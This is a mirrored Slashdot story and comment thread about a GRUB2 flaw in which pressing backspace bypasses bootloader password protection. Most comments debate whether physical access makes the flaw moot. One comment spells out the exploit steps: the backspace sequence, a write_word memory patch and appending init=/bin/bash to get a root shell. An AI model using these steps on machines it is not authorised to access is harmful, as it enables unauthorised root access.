Slashdot Mirror

← Back to Stories (view on slashdot.org)

0-Day GRUB2 Authentication Bypass Hits Linux (hmarco.org)

Posted by Soulskill on from the caught-and-fixed dept.

prisoninmate writes: A zero-day security flaw was discovered by developers Ismael Ripoll and Hector Marco in the upstream GRUB2 packages. GRUB2 did not correctly handle the backspace key when the bootloader was configured to use password protected authentication, thus allowing a local attacker to bypass GRUB's password protection. Versions from 1.98 (December, 2009) to 2.02 (December, 2015) are affected. At the moment, it looks like only a few distributions received the patched GRUB2 versions, including Ubuntu, Debian (Squeeze LTS only) and Red Hat Enterprise Linux 7.

12 of 144 comments (clear)

  1. News for nerds? by Anonymous Coward · · Score: 4, Insightful

    Is this even an issue?

    It's a password on the boot loader. It's not encrypting anything. If anyone is in the position to interact with a machine before the OS has loaded, they've probably got enough access to it that they can do whatever the hell they want, including booting the system off alternative media and replacing or reconfiguring said boot loader.

    1. Re:News for nerds? by JackieBrown · · Score: 3, Insightful

      Then why offer a password on a bootloader?

    2. Re:News for nerds? by i.r.id10t · · Score: 4, Insightful

      I can see where a boot password would be handy for a kiosk or similar setup where the machine is out in public space, and I'd definitely want it locked down to some degree. BIOS boot options as well.

      For a server room, this is no big deal.

      --
      Don't blame me, I voted for Kodos
    3. Re:News for nerds? by segedunum · · Score: 4, Insightful

      Its news, but it's not as big as many people think. When someone can physically get to your machine you're going to need an awful lot more than a bootloader password to secure things.

  2. This is not security by Froze · · Score: 4, Insightful

    In the majority of cases if you are interacting with the boot process then you have physical access to the machine. So unless GRUB is managing disk encryption you have access regardless of the password in GRUB. This is security theater, not real security and breaking it is not accomplishing anything significant.

    Next Story.

    --
    -- The morphemes of your disquisition are ascertainable, but they have eschewed an ambit of transpicuous exposition.
  3. What about systemd-grub? by Anonymous Coward · · Score: 5, Funny

    The new systemd-grub leverages a pre-boot, machine-level dbus interface to policy-kit and systemd-logind, which will handle this for you. Why are people still in the dark ages with bootloader passwords?

  4. Yawn.... by Lumpy · · Score: 3, Insightful

    If someone has local access, they OWN the machine already. This is a minor inconvenience as zero security is given with a grub password anyways.

    --
    Do not look at laser with remaining good eye.
  5. Re:.04 versions? by spirtbrat · · Score: 3, Informative

    It's a boot loader. And as boot loaders go, GRUB2 is already packed with features. What more do you expect it to be developed?

  6. Re:Slackware for the win by Viol8 · · Score: 3, Informative

    Sadly slackware also appears to be slowly winding down. Sure its still being updated on an ad hoc package by package basis, by there hasn't been a full distro release for 2.5 years now. Thats not a good sign.

  7. Re:Of course this is security by Anonymous Coward · · Score: 3, Interesting

    What if you can't take the machine apart inconspicuously because the case is sealed. What if you have only 3 minutes before someone else comes by? Security is not black and zero at all.

    That is like the most contrived example ever. Perhaps you shouldn't take use cases from Hollywood flicks?
    We are talking about the boot process, the computer wouldn't be shut down if the user was away for three minutes.
    More realistic scenario would be laptop left in hotel room and an option would be to just steal the laptop and have all the time in the world.

  8. tl;dr by SharpFang · · Score: 3, Informative

    press backspace 28 times [enter]
    write_word 0x7eb514e 0x90909090[enter]
    normal[enter]
    Enter 'edit mode'
    append init=/bin/bash to the linux entry
    F10

    --
    45 5F E1 04 22 CA 29 C4 93 3F 95 05 2B 79 2A B2
  9. Re:Slackware for the win by DarkOx · · Score: 3, Informative

    Slackware is not winding down. There has not been a release because there has been little reason for one. With so much in flux Systemd, X/Wayland, GCC 5 stabilizing, and XFCE Slackware's 2nd of 2 DE's having only recently itself having a major release 14.1 has aged well. I think figuring out where udev/eudev were going also has held things up a bit.

    The changelog has been very active the past couple months. Patrick is making noise about 'betas' etc and the other developers like Robby and Eric are also hinting. A new release is coming.

    What you have to realize about Slackware is, releases are not done for their own sake. They done for the sake of major changes and improvements. Slackware only implements major changes / forklifts when its clear they won't be walking back those changes or replacing them again with something else in the near future. Slackware really takes stability and consistency very very seriously.

    The 'faster' thing move in the Linux ecosystem the longer the Slackware team has to wait for the dust to settle.

    --
    Repeal the 17th Amendment TODAY! Also Please Read http://www.gnu.org/philosophy/right-to-read.html